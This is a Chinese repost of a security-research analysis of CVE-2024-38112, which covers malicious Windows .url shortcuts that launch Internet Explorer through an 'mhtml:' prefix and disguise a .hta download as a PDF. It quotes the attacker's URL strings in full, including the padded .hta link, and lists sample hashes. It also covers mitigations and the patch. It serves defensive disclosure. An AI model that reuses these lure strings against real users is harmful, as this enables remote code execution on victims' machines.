日
一
二
三
四
五
六
29
廿七
30
廿八
1
国庆节
2
三十
3
九月
4
初二
5
初三
6
初四
7
初五
8
寒露
9
初七
10
初八
11
重阳节
12
初十
•2024 年国庆放假时间•
10月1日至10月7日放假,共7天
9月29日(周日)、10月12日(周六)补班
简介和背景
Check Point Research 最近发现,威胁行为者一直在使用新颖的(或以前未知的)技巧来引诱 Windows 用户进行远程代码执行。具体来说,攻击者使用特殊的 Windows Internet 快捷方式文件(.url 扩展名),单击该文件时会调用已退役的 Internet Explorer (IE) 来访问攻击者控制的 URL。在 IE 上还使用了另一种技巧来隐藏恶意的 .hta 扩展名。通过使用 IE 而不是 Windows 上更安全的现代 Chrome/Edge 浏览器打开 URL,攻击者在利用受害者的计算机方面获得了显著优势,尽管该计算机运行的是现代的 Windows 10/11 操作系统。
从技术背景来看, 威胁行为者使用 .url 文件作为初始攻击媒介的情况并不少见。甚至以前也发生过使用新型或零日 url 文件相关漏洞的情况——去年 11 月刚刚修补的CVE-2023-36025就是一个很好的例子。
我们发现的恶意 .url 样本最早可以追溯到 2023 年 1 月 (一年多前),最晚可以追溯到 2024 年 5 月 13 日 (截至撰写本文时,仅几天前)。这表明威胁行为者已经使用这些攻击技术一段时间了。
通过“mhtml”技巧复活 Internet Explorer
让我们使用 Virus Total 上的最新 .url样本作为示例来解释该技术。
样本内容:
我们可以看到,.url 文件的最后几行字符串指向 Microsoft Edge 应用程序文件中的自定义图标msedge.exe
。这会使它看起来指向 PDF 文件(但事实上并非如此)。
重要的是,我们可以看到,关键字的值URL
与通常的值有很大不同 - 通常,对于常见的 .url 文件,URL
参数看起来像URL=https://www.google.com
指向 URL https://www.google.com
。但在这个示例中,该值为:
mhtml:http: //cbmelipilla.cl/te/test1.html !x-usc:http://cbmelipilla.cl/te/test1.html
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
它使用了一个特殊的前缀mhtml:
,并且!x-usc:
中间还有一个。
几年前,我们在臭名昭著的 CVE-2021-40444 零日攻击中看到了同样的技巧(我们称之为“mhtml”技巧) ,其中文件document.xml.rels
包含完全相同的字符串。
我们知道,在利用 CVE-2021-40444 漏洞时,Word 文档中曾使用过“mhtml”技巧,现在我们看到在 .url 文件中也使用了相同的技巧。那么,攻击者可以利用这个技巧实现什么呢?让我们做一些测试。
如果我们将样本重命名为Books_A0UJKO.pdf.url
(野外名称),.url 文件在(完全修补的)Windows 11 上将如下所示 - 显示为指向 PDF 文件的链接。
如果我们像受害者一样操作(我们想要打开 PDF),我们双击快捷方式文件。然后,受害者将得到以下内容:
看到有什么奇怪的地方了吗? Internet Explorer 打开了。事实上,通过一些调试技巧,我们能够确认 IE 确实被用来打开http://cbmelipilla[.]cl/te/test1.html
.url 文件中指定的链接。
众所周知,微软几年前就宣布 IE 退役 。在典型的 Windows 10/11 上,正常的用户操作不应该能够打开 IE 来访问网站,因为它们不具备与现代浏览器相同的安全级别。IE 是一款过时的网络浏览器,以不安全而闻名——这是微软用现代且更安全的 Microsoft Edge 取代它的重要原因之一,或者用户只需安装并使用 Google 的 Chrome 浏览器即可。
免责声明:尽管 IE 已被宣布“退役并停止支持”,但从技术上讲,IE 仍然是 Windows 操作系统的一部分,并且“本质上并不不安全,因为 IE 仍然提供安全漏洞服务,并且应该没有已知的可利用的安全漏洞”,根据我们与微软的沟通。
因此,默认情况下,用户不应使用 IE 打开网站,除非用户明确要求并且用户完全知情。
然而,在这个样本中,使用“mhtml”技巧,当受害者打开.url 快捷方式时(受害者认为他/她正在打开 PDF),攻击者控制的网站是使用 IE 打开的,而不是典型的 Chrome/Edge。
从那里(使用 IE 打开网站),攻击者可以做很多坏事,因为 IE 不安全且过时。例如,如果攻击者有一个 IE 零日漏洞(与 Chrome/Edge 相比更容易找到),攻击者可以攻击受害者以立即获得远程代码执行。然而,在我们分析的样本中,威胁行为者没有使用任何 IE 远程代码执行漏洞。相反,他们使用了 IE 中的另一个技巧(据我们所知,以前可能不为公众所知)来诱骗受害者获得远程代码执行。
额外的 IE 技巧 – 隐藏 .hta 扩展名
让我们再次回顾上图(下面突出显示)。根据提升的(IE)对话框,它似乎要求用户打开一个名为的 PDF 文件Books_A0UJKO.pdf
。
然而,这是真实情况吗?你认为你打开的是 PDF 吗?
不是的。如果我们在上面的 IE 对话框中单击“打开”(默认选项),我们将得到另一个弹出的对话框(见下文)。这是由于 IE 的保护模式(相对较弱的浏览器沙盒)。
如果受害者继续忽略警告(因为受害者认为他/她正在打开 PDF),受害者的机器最终将被黑客入侵——“打开”的文件实际上是正在下载和执行的恶意 .hta 文件。
如果我们仔细观察 HTTP 流量,我们会发现字符串末尾附加了许多不可打印的字符Books_A0UJKO.pdf
。最后是 .hta 字符串——这是真正的(也是危险的)扩展名。
这正是 IE 对话框不向用户显示 .hta 文件名的原因。真正的完整 URL 是:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E 2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0 %80%E2%A0%80.hta
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%8 0%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%8 0%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
利用这种技巧,攻击者可以更成功地引诱受害者继续执行操作,而事实上受害者正在下载并执行危险的 .hta 应用程序。
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 6514 2c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
防御与缓解
我们已经确认,所讨论的利用技巧 - 已在野外积极使用了至少一年 - 适用于最新的 Windows 10/11 操作系统。
在本文发布数月前,Check Point 已为我们的客户发布了针对 IPS 和 Harmony Email 的以下保护措施,IPS 签名名为“Internet 快捷方式文件远程代码执行”,以防范此零日攻击。
Harmony Email and Collaboration 以最高安全级别提供针对此类零日攻击的全面内联保护。
我们于 2024 年 5 月 16 日星期四向 Microsoft 安全响应中心 (MSRC) 报告了我们的发现。从那时起,双方就此事密切合作,最终 Microsoft 于 7 月 9 日发布了官方补丁 (CVE-2024-38112)。强烈建议 Windows 用户尽快应用该补丁。
对于担心的 Windows 用户,我们建议特别警惕来自不受信任来源的 .url 文件。正如我们所讨论的,这种类型的攻击需要一些警告(用户交互)才能成功。
Check Point Research 持续监控全球范围内与此类攻击相关的活动。
[7月16日更新]
我们从微软了解到,我们的研究实际上已经产生了两个补丁,而不仅仅是之前报道的 CVE-2024-38112。微软针对我们的发现发布了另一个“纵深防御”补丁。请参阅 MSRC 与我们分享的以下官方确认(也可以通过一些搜索关键字在https://msrc.microsoft.com/update-guide/acknowledgement找到)。
正如我们所讨论的,我们在这些攻击中发现了两个零日漏洞技巧。因此,我们猜测 CVE-2024-38112 用于修补 IE 中的“隐藏 .hta 扩展名”技巧,而这个“纵深防御”补丁(无 CVE-ID)用于取消注册 .url 文件中的“mhtml”句柄。我们的分析表明,安装 7 月补丁后,如果受害者单击恶意 .url 文件,将出现以下对话框,这确保 IE 不会再通过“mhtml”技巧从恶意 .url 文件打开。
[更新结束]
结论
从漏洞利用的角度总结一下这些攻击:这些活动中使用的第一种技术是“mhtml”技巧,它允许攻击者调用 IE,而不是更安全的 Chrome/Edge。第二种技术是 IE 技巧,让受害者相信他们正在打开 PDF 文件,而事实上,他们正在下载和执行一个危险的.hta应用程序。这些攻击的总体目标是让受害者相信他们正在打开 PDF 文件,而这可以通过使用这两种技巧来实现。
原文始发于微信公众号(OSINT研习社):复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论